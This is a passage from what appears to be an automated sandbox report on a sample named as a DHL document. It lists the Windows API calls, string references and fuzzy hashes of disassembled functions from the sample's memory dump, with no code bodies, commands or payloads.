SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00483850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00483876

Strings

Listbox, xrefs: 0048380F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 80da046da61dc168ad6b88be062ac94df8f0284c97e23ad442574e95b965a020
Instruction ID: 172d8a895e10a3dc37e1b00a5c65662c75bb55efccbb1e87ff71bf6579525d45
Opcode Fuzzy Hash: 80da046da61dc168ad6b88be062ac94df8f0284c97e23ad442574e95b965a020
Instruction Fuzzy Hash: 2321C272610118BBEF11AF54CC85FBF37AEEF89B50F108525F9049B290CA75DC5287A4

Function 004649F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00464A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00464A5C
SetErrorMode.KERNEL32(00000000,?,?,0048CC08), ref: 00464AD0

Strings

%lu, xrefs: 00464A6F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 97aacbc36b8044d25b4fd8df39f6dabdcb92055492918e1ae35c3a6cf4b61055
Instruction ID: d04aff682bde99685981fa4f1e50e51ca13b72045f524ffed2065ab9e75a3f50
Opcode Fuzzy Hash: 97aacbc36b8044d25b4fd8df39f6dabdcb92055492918e1ae35c3a6cf4b61055
Instruction Fuzzy Hash: E6315E75A00108AFDB11DF54C8C5EAE7BF8EF48308F1480AAE909DB252D775ED45CB65

Function 004841EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0048424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00484264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00484271

Strings

msctls_trackbar32, xrefs: 00484226

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 481b04683586f995457d41140bce1b511f0e5710579673831528240fa1424656
Instruction ID: 7f3a72d5a9822bbddb3227102a6f4a82b6ebfb50ca3d9e2da9344c7aea177102
Opcode Fuzzy Hash: 481b04683586f995457d41140bce1b511f0e5710579673831528240fa1424656
Instruction Fuzzy Hash: 5E1127312442097EEF206F24CC06FAB3BACEFC5764F110525FA50E21A0D675D8119724

Function 00452F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003F6B57: _wcslen.LIBCMT ref: 003F6B6A

Part of subcall function 00452DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00452DC5
Part of subcall function 00452DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00452DD6
Part of subcall function 00452DA7: GetCurrentThreadId.KERNEL32 ref: 00452DDD
Part of subcall function 00452DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00452DE4

GetFocus.USER32 ref: 00452F78

Part of subcall function 00452DEE: GetParent.USER32(00000000), ref: 00452DF9

GetClassNameW.USER32(?,?,00000100), ref: 00452FC3
EnumChildWindows.USER32(?,0045303B), ref: 00452FEB

Strings

%s%d, xrefs: 00452FFF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: e0628f99ed7d24c239f641f339120c05aaa841d817fddf00b13e0305ef5fec28
Instruction ID: 0f82be62f6a8490b1144474ad14ea74c86ebd7a04d8a69c83dd0b48039bb3a05
Opcode Fuzzy Hash: e0628f99ed7d24c239f641f339120c05aaa841d817fddf00b13e0305ef5fec28
Instruction Fuzzy Hash: 2211C3712002096BCF517F618C96EEE376AAF84306F04407ABD09AB297DE74590D8B74

Function 00485882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004858C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 004858EE
DrawMenuBar.USER32(?), ref: 004858FD

Strings

0, xrefs: 0048588F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 075862c9ed5fc9b7fee9a8e67b69f15b7ca3f0ec19a5d0617be27c328885c1e9
Instruction ID: e81381b3c9e6d46153f12fa51f79368ad6beb73434b0621be6f651ac08f47256
Opcode Fuzzy Hash: 075862c9ed5fc9b7fee9a8e67b69f15b7ca3f0ec19a5d0617be27c328885c1e9
Instruction Fuzzy Hash: 3A016D71500218EFDB21AF11DC44BAFBBB4FB45760F1084AAE849D62A1DB348A84DF79

Function 0044D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0044D3BF
FreeLibrary.KERNEL32 ref: 0044D3E5

Strings

GetSystemWow64DirectoryW, xrefs: 0044D3B9
X64, xrefs: 0044D2A8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: aaf8e93f4021ca041538ed19166f6528c15e24d6a2970b83f0293bc7c6039c5f
Instruction ID: b0696bc86667217f37066244b90b1209df304a4af4e88c7892c2e4331e05b46a
Opcode Fuzzy Hash: aaf8e93f4021ca041538ed19166f6528c15e24d6a2970b83f0293bc7c6039c5f
Instruction Fuzzy Hash: 1FF0A731D0561197F77166105CD8A9E3314BF11B01B9485ABE801F5259D7BCCD454BAE

Function 0045007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c6dfed696f992a9b071a2c212b819ba703cefb8ff64526375d46fdc43ec3b6
Instruction ID: b8d31c8e30f9867714135620b3f5367c86e0ec053039b3b191a7ae0cb794b4a4
Opcode Fuzzy Hash: e8c6dfed696f992a9b071a2c212b819ba703cefb8ff64526375d46fdc43ec3b6
Instruction Fuzzy Hash: 50C18D79A00206EFCB14CFA4C894EAEB7B5FF48705F208599E805EB252C735ED46CB94

Function 0047342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00473459
CoUninitialize.OLE32 ref: 00473463
VariantInit.OLEAUT32(?), ref: 0047346E
VariantClear.OLEAUT32(?), ref: 0047371B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: e1f8efc25841f3bf5401df36f8fad1fd2a3cf0ef031d6067d488cf4953056280
Instruction ID: 2f1fbab8f1ada27a1bdf2192cd2baa2b6ffd6938156badaa2e9b301142842e70
Opcode Fuzzy Hash: e1f8efc25841f3bf5401df36f8fad1fd2a3cf0ef031d6067d488cf4953056280
Instruction Fuzzy Hash: CEA19875204300AFC710DF28C485A6AB7E4FF89714F04885EF98A9B362DB34EE05CB96

Function 00450436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0048FC08,?), ref: 004505F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0048FC08,?), ref: 00450608
CLSIDFromProgID.OLE32(?,?,00000000,0048CC40,000000FF,?,00000000,00000800,00000000,?,0048FC08,?), ref: 0045062D
_memcmp.LIBVCRUNTIME ref: 0045064E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 45a58d3d076695a54e398eac4ce27d9f78daf42622de22f41b43a22175234813
Instruction ID: 29e10c40c47206fd5e757fb4c94852a8b08ef0dd0a47c255cd2fa2bf66d597b4
Opcode Fuzzy Hash: 45a58d3d076695a54e398eac4ce27d9f78daf42622de22f41b43a22175234813
Instruction Fuzzy Hash: 54816D75A00109EFCB04DF94C984EEEB7B9FF89305F204559F906AB251DB35AE0ACB64

Function 00431391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004314C0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0ba9fd2ae4cb58d8a7af2469aa0a1e9ff2116a13a1de738134a8cb7651d0ddf7
Instruction ID: 65fe38f356106820a60d04bc5fa76b51e77e4f2d3ce91d67af362e7d655ff17d
Opcode Fuzzy Hash: 0ba9fd2ae4cb58d8a7af2469aa0a1e9ff2116a13a1de738134a8cb7651d0ddf7
Instruction Fuzzy Hash: 24417031B001106BDB217BBE9C456AF3AA5EF59374F14526FF419C22A1EA3C4842436A

Function 00486278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00DEE4C8,?), ref: 004862E2
ScreenToClient.USER32(?,?), ref: 00486315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00486382

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 911c606af295a787b4a3766a439d3a019795d3c26aa58ff2fbf9cadacde17486
Instruction ID: bf26de3b5c76c2014d17e6e465147e70337d8c0d6b767f2a7dd65807d9177419
Opcode Fuzzy Hash: 911c606af295a787b4a3766a439d3a019795d3c26aa58ff2fbf9cadacde17486
Instruction Fuzzy Hash: 81513974A00209EFCB50EF68D880AAE7BB5FF45360F11896AF9159B3A0D734ED81CB54

Function 00471AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00471AFD
WSAGetLastError.WSOCK32 ref: 00471B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00471B8A
WSAGetLastError.WSOCK32 ref: 00471B94

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 8428283f8050416f5ebf7b0488561589f8f98d5f5026d1d3822289270874f467
Instruction ID: 04d587302480ff1a46039f1ae9838fab5bd6750dec5dc57913cc03559adced7c
Opcode Fuzzy Hash: 8428283f8050416f5ebf7b0488561589f8f98d5f5026d1d3822289270874f467
Instruction Fuzzy Hash: E941CD34640200AFE720AF24C886F7A77E5AB44718F54C45DFA1A9F3D3D676ED428B94

Function 0042B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a512941bc1d3be2d9f402dc0c0347049f94c0bc74d8be09866ba624549a42d5f
Instruction ID: 4dbbb687ce08803d6b2904b2abc85c9ed469ba79cba645b179599302d466ca5d
Opcode Fuzzy Hash: a512941bc1d3be2d9f402dc0c0347049f94c0bc74d8be09866ba624549a42d5f
Instruction Fuzzy Hash: 5A412871B00714BFD724AF39DC41BAABBA9EB88724F50452FF041DB291D379994187C8

Function 004656D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00465783
GetLastError.KERNEL32(?,00000000), ref: 004657A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004657CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004657FA

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 287492ebae11acef57f92375cb3566da5ab585361ac42739bd4f0cd59289034a
Instruction ID: 6db8cb94d8adb7e77959142d57c7ce9fd982ee05a20edcc8404dc74d812db1c7
Opcode Fuzzy Hash: 287492ebae11acef57f92375cb3566da5ab585361ac42739bd4f0cd59289034a
Instruction Fuzzy Hash: A2415F39600615DFCB11EF15C544A2EBBE2EF49720F188889E94A9F362DB74FD04CB95

Function 0042D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00416D71,00000000,00000000,004182D9,?,004182D9,?,00000001,00416D71,?,00000001,004182D9,004182D9), ref: 0042D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0042D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0042D9AB
__freea.LIBCMT ref: 0042D9B4

Part of subcall function 00423820: RtlAllocateHeap.NTDLL(00000000,?,004C1444,?,0040FDF5,?,?,003FA976,00000010,004C1440,003F13FC,?,003F13C6,?,003F1129), ref: 00423852

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 45e4b629cabeb92348585a4bce684911f2aa2609615f5cba37da1d56d055a9eb
Instruction ID: 2d21967d96219998749e279bb71ecf0606d33e7e3d333c3a58ce5c69c84fec97
Opcode Fuzzy Hash: 45e4b629cabeb92348585a4bce684911f2aa2609615f5cba37da1d56d055a9eb
Instruction Fuzzy Hash: 0531A2B1A0021AABDB24DF65EC85EAF7BA5EF40310F55416AFC04D6250D739CD90CB94

Function 004852C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00485352
GetWindowLongW.USER32(?,000000F0), ref: 00485375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00485382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004853A8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: ba6f3999685d0090d5ab95176e841b19abb24325cec4f3446a5bc94c2a8094bf
Instruction ID: e70f3620527e6c2764c816a27b9ffa480f7a1e11828a126de148c2cbba6651d0
Opcode Fuzzy Hash: ba6f3999685d0090d5ab95176e841b19abb24325cec4f3446a5bc94c2a8094bf
Instruction Fuzzy Hash: 5931D434A55A08FFEB31AA14CC45FEE3761AB05391F584817FE10962E1C7B89E40975A

Function 0045AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0045ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0045AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0045AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0045ACC6

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7d4cbe66620f7de7d23d469b15cfc3d21ba169c9687879f13cca2997caa7c61a
Instruction ID: 4564a86129828aa74d7430e056d0f9d07519d8dd45eaf3e8c792136e9bbbd318
Opcode Fuzzy Hash: 7d4cbe66620f7de7d23d469b15cfc3d21ba169c9687879f13cca2997caa7c61a
Instruction Fuzzy Hash: 3D311A309002186FEF36CB6588097FF7AA5AB45312F04471FE885562D2D37C89A9875A

Function 00487674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048769A
GetWindowRect.USER32(?,?), ref: 00487710
PtInRect.USER32(?,?,00488B89), ref: 00487720
MessageBeep.USER32(00000000), ref: 0048778C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c4b38b935814676999221f87bff22fc02c9c679519accbbda6eefcd573613144
Instruction ID: 33f65d4ad6bc72ac19a14467af8ca03fdc10735e762505de6fa8c2415a8587c7
Opcode Fuzzy Hash: c4b38b935814676999221f87bff22fc02c9c679519accbbda6eefcd573613144
Instruction Fuzzy Hash: 4F419C786052149FCB01EF58C8A4EAD77F4FB4A314F2848AAE8149B361D338F941DF98

Function 004816DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004816EB

